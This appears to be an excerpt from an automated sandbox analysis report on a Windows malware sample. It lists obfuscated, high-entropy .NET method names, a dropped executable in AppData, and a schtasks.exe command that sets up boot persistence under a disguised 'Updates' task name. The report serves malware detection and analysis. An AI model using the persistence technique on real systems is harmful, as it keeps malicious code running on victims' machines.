Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Code function: 0_2_0119765D push ecx; retf	0_2_0119765E

Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Static PE information: section name: .text entropy: 7.918332877222406
Source: jYRIGnZlROed.exe.0.dr	Static PE information: section name: .text entropy: 7.918332877222406

Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f2275c.7.raw.unpack, fJ.cs	High entropy of concatenated method names: 'Jj1', 'MjV', 'VmD', 'OjP', 'AjI', 'sj9', 'jjb', 'yjh', 'RgtTUJcyZL', 'Vmf'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, w5kRXIEyNHLCA4q0mI.cs	High entropy of concatenated method names: 'G87QY5rCiv', 'bMjQ6A5qQn', 'G9TQGgmJN7', 'KK2QfIfNxB', 'ELNQol2WoL', 'qANQ3ZHbfh', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, TP8g38Um4R6d0M0DsL.cs	High entropy of concatenated method names: 'JxsR4M6mwg', 'dpFRnqCb8V', 'jBNRKAd0el', 'WL2RChXldT', 'vb6RMkEhY4', 'nvnRgvx2Wc', 'd8URxSnFQ1', 'B81RQ35TIb', 'zC3RuIM5kk', 'yNMRedJXge'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, yYEr0RR3riR6w5Fsow.cs	High entropy of concatenated method names: 'ck7NHsTAAb', 'VwVNVty9Od', 'Y7BNTSFkZt', 'irKN4aIOQu', 'EylNsiv4TV', 'SNUNnb6pH3', 'BqtNpO6Vgw', 'rxNNKB4VFM', 'MPfNC7HD9u', 'gRrN0WIY1k'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, xFVsduJMHuXdxbPXUph.cs	High entropy of concatenated method names: 'p2iuH5300i', 'huFuVBZ1TC', 'vINuTJvWmd', 'WJFu4oFOBC', 'D5Lussc0GL', 'AXEunDPNK8', 'sKJupcBoFn', 'vHduK40FPs', 'NgCuCJvM27', 'rxFu0HPtPu'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, LKBfTCbdQSshkW5PVZ.cs	High entropy of concatenated method names: 'fpTN2AFvK3', 'bsDNRBcYVu', 'qdDNZoCpvM', 'zl2ZLqH1MB', 'Ch2ZzQYdDE', 'pitNlyYA1A', 'ByMNqTUeSd', 'BEmN5dknQY', 'IPeNAPvH8e', 'G9bNwUXBkD'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, vGvJNFae6POHakxWt5.cs	High entropy of concatenated method names: 'YMnAWH6tpI', 'FJlA2CvBeZ', 'tRBAiKUaUx', 'Xy5ARfna65', 'jm3AyVfOTc', 'EdIAZKPuxv', 'qBFANaP4bC', 'mCoAPl5WQE', 'au9AawKXL2', 'DQuAjRDnDU'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, UakL7sKoGotEXVmhgN.cs	High entropy of concatenated method names: 'yv0DKe0Efo', 'chcDCmQNmk', 'Is4DYyj478', 'mqmD6Wp51S', 'VZ2Df8cehC', 'fldD3Hx8yn', 'I1vD7DYEJp', 'lcKDmOuygF', 'nL5DkA7W3W', 'jO6DIXLsX4'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, DXYb74JvCf3hSRbyBWK.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Um7eosP2VG', 'hn7e9Rp4Rn', 'gpUehFMoby', 'EqUeORScKD', 'OodeB6vABr', 'yLUedB62pu', 'MpGeJMf50K'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, M782IFS87VYPID5jlC.cs	High entropy of concatenated method names: 'SHSZW1wwwP', 'eUrZi37vuR', 'b2IZyilGsW', 'JAUZNimGqU', 'JsgZP4cL7A', 'jBAyBcS2rJ', 'BGUydYvGPw', 'QmvyJD43Ro', 'VO2ySSX79T', 'zdgy1k5DRe'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, Ol4IUSXbtb4CW66ULT.cs	High entropy of concatenated method names: 'YitioNl8ZN', 'WQyi9PC8a1', 'vffih6UNxm', 'YGjiOmGUtS', 'tkdiBc3DVl', 'zyKid3Jh6r', 'AxriJ4cAVT', 'g00iSFHVG3', 'Uuti1Gvff5', 'd8yiLa9iNA'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, eQoN8V4ZQKOo5fBfcW.cs	High entropy of concatenated method names: 'PVITHiYMI', 'BXX4UDESn', 'zVvndL8xI', 'A4HplBlLC', 'Hc3Cq4Pec', 'bhJ0sNW3V', 'VeDtudvwe8Kp8BBQWf', 'Q2iHZJuUPGeBXgH0eV', 'dT0Q1qBVQ', 'rHGeOHNvl'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, Q88LQxsQcXJs1kQMVN.cs	High entropy of concatenated method names: 'KYQqNOknVA', 'JsKqPxL3AM', 'vJ6qjHr2H8', 'fbmqvDCgZM', 'MV0qMFyNbR', 'muNqg3lCEj', 'NewQQPQbSoli1jKWX4', 'DDJmPwRXAhSULraE4C', 'G7QqqvHB90', 'pf1qA6b6yY'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, jUd3Iw3wbFFMK2SL4c.cs	High entropy of concatenated method names: 'OyHxjrMD2B', 'WxixvJQb6a', 'ToString', 'NDbx2LWeVU', 'E13xitmdhK', 'BvOxRGmfDc', 'WyRxysCXEy', 'mnDxZMayFq', 'TUGxN5Dg60', 'vDDxPiPfg0'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, lj55A0LOMPVEbPDdds.cs	High entropy of concatenated method names: 'Dispose', 'sIiq1D20WY', 'AX856IdXYq', 'CN2bbTKMQA', 'qYLqLD8uUx', 'Jtfqz5kYM0', 'ProcessDialogKey', 'Jwc5l6yGwy', 'cPW5qnhV2Z', 'WyQ55b3Ps4'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, i683mmclysbpgLaM5y.cs	High entropy of concatenated method names: 'LkLQ2HQhaZ', 'IHmQiUDvlN', 'zcGQR9R6i6', 'H6TQyuPmso', 'PiHQZ245aP', 'gmgQNvBWBQ', 'J6bQPV6q9W', 'LGxQaLLt1g', 'LLYQjmDqO1', 'AosQv3IoRq'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, S0hOXR1XtDPS19yNu0.cs	High entropy of concatenated method names: 'ToString', 'KSagIOkILO', 'zLyg67KPmf', 'YexgGyZO44', 'dS9gfvTiDl', 'VZ3g3EDf7E', 'pi4gFZLDSm', 'DW7g7p351H', 'dyEgmw1BUC', 'NrcgEVowVo'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, Jgrt1XzoXMntc59G8h.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wFYuDNr6RX', 'TeUuMcGX7V', 'NDIugjMNay', 'F1TuxZG4fu', 'SvquQKU1o2', 'GH3uue7yX0', 'WG8ue2ETdM'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, tyZ3hcDXwYckf869Y8.cs	High entropy of concatenated method names: 'eM9uqNuOZX', 'AXLuARbs4O', 'kn3uwRMR4M', 'BJxu2khww4', 'MwauifwuEO', 'JR8uyB8w8f', 'lMguZg2m5e', 'JC0QJjY7I7', 'EXpQSvP7gf', 'm36Q16r8h6'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, H6NLodPeuiC6nVqsgI.cs	High entropy of concatenated method names: 'BCdxSZ9Yc6', 'GvexLuTJUJ', 'kXRQlY7bjo', 'VU7QqAhAVT', 'fiBxIMTlVB', 'PM3xcZyhCY', 'YisxrZi3Uy', 'Jj9xoGV4CX', 'nctx9yuGgd', 'zVMxhNHbhF'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, w5kRXIEyNHLCA4q0mI.cs	High entropy of concatenated method names: 'G87QY5rCiv', 'bMjQ6A5qQn', 'G9TQGgmJN7', 'KK2QfIfNxB', 'ELNQol2WoL', 'qANQ3ZHbfh', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, TP8g38Um4R6d0M0DsL.cs	High entropy of concatenated method names: 'JxsR4M6mwg', 'dpFRnqCb8V', 'jBNRKAd0el', 'WL2RChXldT', 'vb6RMkEhY4', 'nvnRgvx2Wc', 'd8URxSnFQ1', 'B81RQ35TIb', 'zC3RuIM5kk', 'yNMRedJXge'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, yYEr0RR3riR6w5Fsow.cs	High entropy of concatenated method names: 'ck7NHsTAAb', 'VwVNVty9Od', 'Y7BNTSFkZt', 'irKN4aIOQu', 'EylNsiv4TV', 'SNUNnb6pH3', 'BqtNpO6Vgw', 'rxNNKB4VFM', 'MPfNC7HD9u', 'gRrN0WIY1k'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, xFVsduJMHuXdxbPXUph.cs	High entropy of concatenated method names: 'p2iuH5300i', 'huFuVBZ1TC', 'vINuTJvWmd', 'WJFu4oFOBC', 'D5Lussc0GL', 'AXEunDPNK8', 'sKJupcBoFn', 'vHduK40FPs', 'NgCuCJvM27', 'rxFu0HPtPu'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, LKBfTCbdQSshkW5PVZ.cs	High entropy of concatenated method names: 'fpTN2AFvK3', 'bsDNRBcYVu', 'qdDNZoCpvM', 'zl2ZLqH1MB', 'Ch2ZzQYdDE', 'pitNlyYA1A', 'ByMNqTUeSd', 'BEmN5dknQY', 'IPeNAPvH8e', 'G9bNwUXBkD'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, vGvJNFae6POHakxWt5.cs	High entropy of concatenated method names: 'YMnAWH6tpI', 'FJlA2CvBeZ', 'tRBAiKUaUx', 'Xy5ARfna65', 'jm3AyVfOTc', 'EdIAZKPuxv', 'qBFANaP4bC', 'mCoAPl5WQE', 'au9AawKXL2', 'DQuAjRDnDU'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, UakL7sKoGotEXVmhgN.cs	High entropy of concatenated method names: 'yv0DKe0Efo', 'chcDCmQNmk', 'Is4DYyj478', 'mqmD6Wp51S', 'VZ2Df8cehC', 'fldD3Hx8yn', 'I1vD7DYEJp', 'lcKDmOuygF', 'nL5DkA7W3W', 'jO6DIXLsX4'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, DXYb74JvCf3hSRbyBWK.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Um7eosP2VG', 'hn7e9Rp4Rn', 'gpUehFMoby', 'EqUeORScKD', 'OodeB6vABr', 'yLUedB62pu', 'MpGeJMf50K'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, M782IFS87VYPID5jlC.cs	High entropy of concatenated method names: 'SHSZW1wwwP', 'eUrZi37vuR', 'b2IZyilGsW', 'JAUZNimGqU', 'JsgZP4cL7A', 'jBAyBcS2rJ', 'BGUydYvGPw', 'QmvyJD43Ro', 'VO2ySSX79T', 'zdgy1k5DRe'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, Ol4IUSXbtb4CW66ULT.cs	High entropy of concatenated method names: 'YitioNl8ZN', 'WQyi9PC8a1', 'vffih6UNxm', 'YGjiOmGUtS', 'tkdiBc3DVl', 'zyKid3Jh6r', 'AxriJ4cAVT', 'g00iSFHVG3', 'Uuti1Gvff5', 'd8yiLa9iNA'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, eQoN8V4ZQKOo5fBfcW.cs	High entropy of concatenated method names: 'PVITHiYMI', 'BXX4UDESn', 'zVvndL8xI', 'A4HplBlLC', 'Hc3Cq4Pec', 'bhJ0sNW3V', 'VeDtudvwe8Kp8BBQWf', 'Q2iHZJuUPGeBXgH0eV', 'dT0Q1qBVQ', 'rHGeOHNvl'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, Q88LQxsQcXJs1kQMVN.cs	High entropy of concatenated method names: 'KYQqNOknVA', 'JsKqPxL3AM', 'vJ6qjHr2H8', 'fbmqvDCgZM', 'MV0qMFyNbR', 'muNqg3lCEj', 'NewQQPQbSoli1jKWX4', 'DDJmPwRXAhSULraE4C', 'G7QqqvHB90', 'pf1qA6b6yY'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, jUd3Iw3wbFFMK2SL4c.cs	High entropy of concatenated method names: 'OyHxjrMD2B', 'WxixvJQb6a', 'ToString', 'NDbx2LWeVU', 'E13xitmdhK', 'BvOxRGmfDc', 'WyRxysCXEy', 'mnDxZMayFq', 'TUGxN5Dg60', 'vDDxPiPfg0'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, lj55A0LOMPVEbPDdds.cs	High entropy of concatenated method names: 'Dispose', 'sIiq1D20WY', 'AX856IdXYq', 'CN2bbTKMQA', 'qYLqLD8uUx', 'Jtfqz5kYM0', 'ProcessDialogKey', 'Jwc5l6yGwy', 'cPW5qnhV2Z', 'WyQ55b3Ps4'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, i683mmclysbpgLaM5y.cs	High entropy of concatenated method names: 'LkLQ2HQhaZ', 'IHmQiUDvlN', 'zcGQR9R6i6', 'H6TQyuPmso', 'PiHQZ245aP', 'gmgQNvBWBQ', 'J6bQPV6q9W', 'LGxQaLLt1g', 'LLYQjmDqO1', 'AosQv3IoRq'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, S0hOXR1XtDPS19yNu0.cs	High entropy of concatenated method names: 'ToString', 'KSagIOkILO', 'zLyg67KPmf', 'YexgGyZO44', 'dS9gfvTiDl', 'VZ3g3EDf7E', 'pi4gFZLDSm', 'DW7g7p351H', 'dyEgmw1BUC', 'NrcgEVowVo'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, Jgrt1XzoXMntc59G8h.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wFYuDNr6RX', 'TeUuMcGX7V', 'NDIugjMNay', 'F1TuxZG4fu', 'SvquQKU1o2', 'GH3uue7yX0', 'WG8ue2ETdM'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, tyZ3hcDXwYckf869Y8.cs	High entropy of concatenated method names: 'eM9uqNuOZX', 'AXLuARbs4O', 'kn3uwRMR4M', 'BJxu2khww4', 'MwauifwuEO', 'JR8uyB8w8f', 'lMguZg2m5e', 'JC0QJjY7I7', 'EXpQSvP7gf', 'm36Q16r8h6'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, H6NLodPeuiC6nVqsgI.cs	High entropy of concatenated method names: 'BCdxSZ9Yc6', 'GvexLuTJUJ', 'kXRQlY7bjo', 'VU7QqAhAVT', 'fiBxIMTlVB', 'PM3xcZyhCY', 'YisxrZi3Uy', 'Jj9xoGV4CX', 'nctx9yuGgd', 'zVMxhNHbhF'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f32774.6.raw.unpack, fJ.cs	High entropy of concatenated method names: 'Jj1', 'MjV', 'VmD', 'OjP', 'AjI', 'sj9', 'jjb', 'yjh', 'RgtTUJcyZL', 'Vmf'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, w5kRXIEyNHLCA4q0mI.cs	High entropy of concatenated method names: 'G87QY5rCiv', 'bMjQ6A5qQn', 'G9TQGgmJN7', 'KK2QfIfNxB', 'ELNQol2WoL', 'qANQ3ZHbfh', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, TP8g38Um4R6d0M0DsL.cs	High entropy of concatenated method names: 'JxsR4M6mwg', 'dpFRnqCb8V', 'jBNRKAd0el', 'WL2RChXldT', 'vb6RMkEhY4', 'nvnRgvx2Wc', 'd8URxSnFQ1', 'B81RQ35TIb', 'zC3RuIM5kk', 'yNMRedJXge'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, yYEr0RR3riR6w5Fsow.cs	High entropy of concatenated method names: 'ck7NHsTAAb', 'VwVNVty9Od', 'Y7BNTSFkZt', 'irKN4aIOQu', 'EylNsiv4TV', 'SNUNnb6pH3', 'BqtNpO6Vgw', 'rxNNKB4VFM', 'MPfNC7HD9u', 'gRrN0WIY1k'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, xFVsduJMHuXdxbPXUph.cs	High entropy of concatenated method names: 'p2iuH5300i', 'huFuVBZ1TC', 'vINuTJvWmd', 'WJFu4oFOBC', 'D5Lussc0GL', 'AXEunDPNK8', 'sKJupcBoFn', 'vHduK40FPs', 'NgCuCJvM27', 'rxFu0HPtPu'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, LKBfTCbdQSshkW5PVZ.cs	High entropy of concatenated method names: 'fpTN2AFvK3', 'bsDNRBcYVu', 'qdDNZoCpvM', 'zl2ZLqH1MB', 'Ch2ZzQYdDE', 'pitNlyYA1A', 'ByMNqTUeSd', 'BEmN5dknQY', 'IPeNAPvH8e', 'G9bNwUXBkD'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, vGvJNFae6POHakxWt5.cs	High entropy of concatenated method names: 'YMnAWH6tpI', 'FJlA2CvBeZ', 'tRBAiKUaUx', 'Xy5ARfna65', 'jm3AyVfOTc', 'EdIAZKPuxv', 'qBFANaP4bC', 'mCoAPl5WQE', 'au9AawKXL2', 'DQuAjRDnDU'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, UakL7sKoGotEXVmhgN.cs	High entropy of concatenated method names: 'yv0DKe0Efo', 'chcDCmQNmk', 'Is4DYyj478', 'mqmD6Wp51S', 'VZ2Df8cehC', 'fldD3Hx8yn', 'I1vD7DYEJp', 'lcKDmOuygF', 'nL5DkA7W3W', 'jO6DIXLsX4'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, DXYb74JvCf3hSRbyBWK.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Um7eosP2VG', 'hn7e9Rp4Rn', 'gpUehFMoby', 'EqUeORScKD', 'OodeB6vABr', 'yLUedB62pu', 'MpGeJMf50K'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, M782IFS87VYPID5jlC.cs	High entropy of concatenated method names: 'SHSZW1wwwP', 'eUrZi37vuR', 'b2IZyilGsW', 'JAUZNimGqU', 'JsgZP4cL7A', 'jBAyBcS2rJ', 'BGUydYvGPw', 'QmvyJD43Ro', 'VO2ySSX79T', 'zdgy1k5DRe'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, Ol4IUSXbtb4CW66ULT.cs	High entropy of concatenated method names: 'YitioNl8ZN', 'WQyi9PC8a1', 'vffih6UNxm', 'YGjiOmGUtS', 'tkdiBc3DVl', 'zyKid3Jh6r', 'AxriJ4cAVT', 'g00iSFHVG3', 'Uuti1Gvff5', 'd8yiLa9iNA'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, eQoN8V4ZQKOo5fBfcW.cs	High entropy of concatenated method names: 'PVITHiYMI', 'BXX4UDESn', 'zVvndL8xI', 'A4HplBlLC', 'Hc3Cq4Pec', 'bhJ0sNW3V', 'VeDtudvwe8Kp8BBQWf', 'Q2iHZJuUPGeBXgH0eV', 'dT0Q1qBVQ', 'rHGeOHNvl'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, Q88LQxsQcXJs1kQMVN.cs	High entropy of concatenated method names: 'KYQqNOknVA', 'JsKqPxL3AM', 'vJ6qjHr2H8', 'fbmqvDCgZM', 'MV0qMFyNbR', 'muNqg3lCEj', 'NewQQPQbSoli1jKWX4', 'DDJmPwRXAhSULraE4C', 'G7QqqvHB90', 'pf1qA6b6yY'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, jUd3Iw3wbFFMK2SL4c.cs	High entropy of concatenated method names: 'OyHxjrMD2B', 'WxixvJQb6a', 'ToString', 'NDbx2LWeVU', 'E13xitmdhK', 'BvOxRGmfDc', 'WyRxysCXEy', 'mnDxZMayFq', 'TUGxN5Dg60', 'vDDxPiPfg0'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, lj55A0LOMPVEbPDdds.cs	High entropy of concatenated method names: 'Dispose', 'sIiq1D20WY', 'AX856IdXYq', 'CN2bbTKMQA', 'qYLqLD8uUx', 'Jtfqz5kYM0', 'ProcessDialogKey', 'Jwc5l6yGwy', 'cPW5qnhV2Z', 'WyQ55b3Ps4'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, i683mmclysbpgLaM5y.cs	High entropy of concatenated method names: 'LkLQ2HQhaZ', 'IHmQiUDvlN', 'zcGQR9R6i6', 'H6TQyuPmso', 'PiHQZ245aP', 'gmgQNvBWBQ', 'J6bQPV6q9W', 'LGxQaLLt1g', 'LLYQjmDqO1', 'AosQv3IoRq'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, S0hOXR1XtDPS19yNu0.cs	High entropy of concatenated method names: 'ToString', 'KSagIOkILO', 'zLyg67KPmf', 'YexgGyZO44', 'dS9gfvTiDl', 'VZ3g3EDf7E', 'pi4gFZLDSm', 'DW7g7p351H', 'dyEgmw1BUC', 'NrcgEVowVo'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, Jgrt1XzoXMntc59G8h.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wFYuDNr6RX', 'TeUuMcGX7V', 'NDIugjMNay', 'F1TuxZG4fu', 'SvquQKU1o2', 'GH3uue7yX0', 'WG8ue2ETdM'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, tyZ3hcDXwYckf869Y8.cs	High entropy of concatenated method names: 'eM9uqNuOZX', 'AXLuARbs4O', 'kn3uwRMR4M', 'BJxu2khww4', 'MwauifwuEO', 'JR8uyB8w8f', 'lMguZg2m5e', 'JC0QJjY7I7', 'EXpQSvP7gf', 'm36Q16r8h6'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, H6NLodPeuiC6nVqsgI.cs	High entropy of concatenated method names: 'BCdxSZ9Yc6', 'GvexLuTJUJ', 'kXRQlY7bjo', 'VU7QqAhAVT', 'fiBxIMTlVB', 'PM3xcZyhCY', 'YisxrZi3Uy', 'Jj9xoGV4CX', 'nctx9yuGgd', 'zVMxhNHbhF'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.7d80000.15.raw.unpack, fJ.cs	High entropy of concatenated method names: 'Jj1', 'MjV', 'VmD', 'OjP', 'AjI', 'sj9', 'jjb', 'yjh', 'RgtTUJcyZL', 'Vmf'
Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.3308724.3.raw.unpack, fJ.cs	High entropy of concatenated method names: 'Jj1', 'MjV', 'VmD', 'OjP', 'AjI', 'sj9', 'jjb', 'yjh', 'RgtTUJcyZL', 'Vmf'

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

File created: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmp

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
